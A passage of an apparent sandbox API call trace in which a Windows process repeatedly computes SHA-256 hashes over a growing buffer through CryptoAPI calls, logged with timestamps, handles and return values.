	[0199.753] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0199.753] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2692360
	[0199.753] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x2692360, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2692360, pdwDataLen=0x1283b0) returned 1
	[0199.753] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0199.753] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0199.753] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225390) returned 1
	[0199.753] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0199.753] CryptHashData (hHash=0x22b68c0, pbData=0x2756bf0, dwDataLen=0x740, dwFlags=0x0) returned 1
	[0199.753] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0199.753] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2692388
	[0199.753] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x2692388, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2692388, pdwDataLen=0x1283b0) returned 1
	[0199.753] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0199.753] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0199.753] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225390) returned 1
	[0199.754] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0199.754] CryptHashData (hHash=0x22b6600, pbData=0x2756bf0, dwDataLen=0x760, dwFlags=0x0) returned 1
	[0199.754] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0199.754] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26923b0
	[0199.754] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x26923b0, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x26923b0, pdwDataLen=0x1283b0) returned 1
	[0199.754] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0199.754] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0199.754] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225390) returned 1
	[0199.754] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0199.754] CryptHashData (hHash=0x22b68c0, pbData=0x2756bf0, dwDataLen=0x780, dwFlags=0x0) returned 1
	[0199.754] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0199.754] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26923d8
	[0199.754] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x26923d8, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x26923d8, pdwDataLen=0x1283b0) returned 1
	[0199.754] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0199.754] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0199.754] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225390) returned 1
	[0199.755] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0199.755] CryptHashData (hHash=0x22b6600, pbData=0x2756bf0, dwDataLen=0x7a0, dwFlags=0x0) returned 1
	[0199.755] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0199.755] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2692400
	[0199.755] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x2692400, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2692400, pdwDataLen=0x1283b0) returned 1
	[0199.755] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0199.755] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0199.755] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225390) returned 1
	[0199.755] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0199.755] CryptHashData (hHash=0x22b68c0, pbData=0x2756bf0, dwDataLen=0x7c0, dwFlags=0x0) returned 1
	[0199.755] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0199.755] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2692428
	[0199.755] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x2692428, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2692428, pdwDataLen=0x1283b0) returned 1
	[0199.755] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0199.755] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0199.755] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225390) returned 1
	[0199.756] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0199.756] CryptHashData (hHash=0x22b6600, pbData=0x2756bf0, dwDataLen=0x7e0, dwFlags=0x0) returned 1
	[0199.756] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0199.756] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2692450
	[0199.756] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x2692450, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2692450, pdwDataLen=0x1283b0) returned 1
	[0199.756] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0199.756] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0199.756] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225390) returned 1
	[0199.756] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0199.756] CryptHashData (hHash=0x22b68c0, pbData=0x2756bf0, dwDataLen=0x800, dwFlags=0x0) returned 1
	[0199.756] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0199.756] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2692478
	[0199.756] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x2692478, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2692478, pdwDataLen=0x1283b0) returned 1
	[0199.756] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0199.756] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0199.756] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225390) returned 1
	[0199.757] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0199.757] CryptHashData (hHash=0x22b6600, pbData=0x2756bf0, dwDataLen=0x820, dwFlags=0x0) returned 1
	[0199.757] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0199.757] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26924a0
	[0199.757] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x26924a0, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x26924a0, pdwDataLen=0x1283b0) returned 1
	[0199.757] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0199.757] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0199.757] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225390) returned 1
	[0199.757] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0199.757] CryptHashData (hHash=0x22b68c0, pbData=0x2756bf0, dwDataLen=0x840, dwFlags=0x0) returned 1
	[0199.757] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0199.757] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26924c8
	[0199.757] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x26924c8, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x26924c8, pdwDataLen=0x1283b0) returned 1
	[0199.757] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0199.757] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0199.757] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225390) returned 1
	[0199.758] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0199.758] CryptHashData (hHash=0x22b6600, pbData=0x2756bf0, dwDataLen=0x860, dwFlags=0x0) returned 1
	[0199.758] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0199.758] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26924f0
	[0199.758] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x26924f0, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x26924f0, pdwDataLen=0x1283b0) returned 1
	[0199.758] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0199.758] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0199.758] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225390) returned 1
	[0199.758] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0199.758] CryptHashData (hHash=0x22b68c0, pbData=0x2756bf0, dwDataLen=0x880, dwFlags=0x0) returned 1
	[0199.758] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0199.758] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2692518
	[0199.758] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x2692518, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2692518, pdwDataLen=0x1283b0) returned 1
	[0199.758] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0199.758] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0199.758] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225390) returned 1
	[0199.759] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0199.759] CryptHashData (hHash=0x22b6600, pbData=0x2756bf0, dwDataLen=0x8a0, dwFlags=0x0) returned 1
	[0199.759] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0199.759] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2692540
	[0199.759] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x2692540, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2692540, pdwDataLen=0x1283b0) returned 1
	[0199.759] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0199.759] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0199.759] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225390) returned 1
	[0199.759] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0199.759] CryptHashData (hHash=0x22b68c0, pbData=0x2756bf0, dwDataLen=0x8c0, dwFlags=0x0) returned 1
	[0199.759] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0199.759] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2692568
	[0199.759] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x2692568, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2692568, pdwDataLen=0x1283b0) returned 1
	[0199.759] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0199.759] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0199.760] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225390) returned 1
	[0199.760] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0199.760] CryptHashData (hHash=0x22b6600, pbData=0x2756bf0, dwDataLen=0x8e0, dwFlags=0x0) returned 1
	[0199.760] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0199.760] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2692590
	[0199.760] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x2692590, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2692590, pdwDataLen=0x1283b0) returned 1
	[0199.760] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0199.760] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0199.760] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225390) returned 1
	[0199.760] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0199.760] CryptHashData (hHash=0x22b68c0, pbData=0x2756bf0, dwDataLen=0x900, dwFlags=0x0) returned 1
	[0199.760] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0199.760] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26925b8
	[0199.760] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x26925b8, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x26925b8, pdwDataLen=0x1283b0) returned 1
	[0199.760] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0199.760] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0199.761] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225390) returned 1
	[0199.761] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0199.761] CryptHashData (hHash=0x22b6600, pbData=0x2756bf0, dwDataLen=0x920, dwFlags=0x0) returned 1
	[0199.761] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0199.761] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26925e0
	[0199.761] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x26925e0, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x26925e0, pdwDataLen=0x1283b0) returned 1
	[0199.761] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0199.761] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0199.761] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225390) returned 1
	[0199.761] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0199.761] CryptHashData (hHash=0x22b68c0, pbData=0x2756bf0, dwDataLen=0x940, dwFlags=0x0) returned 1
	[0199.761] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0199.761] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2692608
	[0199.761] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x2692608, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2692608, pdwDataLen=0x1283b0) returned 1
	[0199.762] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0199.762] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0199.762] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225390) returned 1
	[0199.762] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0199.762] CryptHashData (hHash=0x22b6600, pbData=0x2756bf0, dwDataLen=0x960, dwFlags=0x0) returned 1
	[0199.762] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0199.762] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2692630
	[0199.762] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x2692630, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2692630, pdwDataLen=0x1283b0) returned 1
	[0199.762] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0199.762] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0199.762] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225390) returned 1
	[0199.762] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0199.762] CryptHashData (hHash=0x22b68c0, pbData=0x2756bf0, dwDataLen=0x980, dwFlags=0x0) returned 1
	[0199.763] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0199.763] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2692658
	[0199.763] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x2692658, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2692658, pdwDataLen=0x1283b0) returned 1
	[0199.763] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0199.763] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0199.763] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225390) returned 1
	[0199.763] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0199.763] CryptHashData (hHash=0x22b6600, pbData=0x2756bf0, dwDataLen=0x9a0, dwFlags=0x0) returned 1
	[0199.763] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0199.763] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2692680
	[0199.763] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x2692680, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2692680, pdwDataLen=0x1283b0) returned 1
	[0199.763] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0199.763] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0199.763] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225390) returned 1
	[0199.763] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0199.763] CryptHashData (hHash=0x22b68c0, pbData=0x2756bf0, dwDataLen=0x9c0, dwFlags=0x0) returned 1
	[0199.764] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0199.764] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26926a8
	[0199.764] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x26926a8, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x26926a8, pdwDataLen=0x1283b0) returned 1
	[0199.764] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0199.764] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0199.764] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225390) returned 1
	[0199.764] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0199.764] CryptHashData (hHash=0x22b6600, pbData=0x2756bf0, dwDataLen=0x9e0, dwFlags=0x0) returned 1
	[0199.764] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0199.764] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26926d0
	[0199.764] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x26926d0, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x26926d0, pdwDataLen=0x1283b0) returned 1
	[0199.764] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0199.764] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0199.764] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225390) returned 1
	[0199.765] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0199.765] CryptHashData (hHash=0x22b68c0, pbData=0x2756bf0, dwDataLen=0xa00, dwFlags=0x0) returned 1
	[0199.765] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0199.765] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26926f8
	[0199.765] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x26926f8, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x26926f8, pdwDataLen=0x1283b0) returned 1
	[0199.765] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0199.765] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0199.765] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225390) returned 1
	[0199.765] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0199.765] CryptHashData (hHash=0x22b6600, pbData=0x2756bf0, dwDataLen=0xa20, dwFlags=0x0) returned 1
	[0199.765] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0199.765] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2692720
	[0199.765] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x2692720, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2692720, pdwDataLen=0x1283b0) returned 1
	[0199.765] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0199.765] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0199.765] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225390) returned 1
	[0199.766] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0199.766] CryptHashData (hHash=0x22b68c0, pbData=0x2756bf0, dwDataLen=0xa40, dwFlags=0x0) returned 1
	[0199.766] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
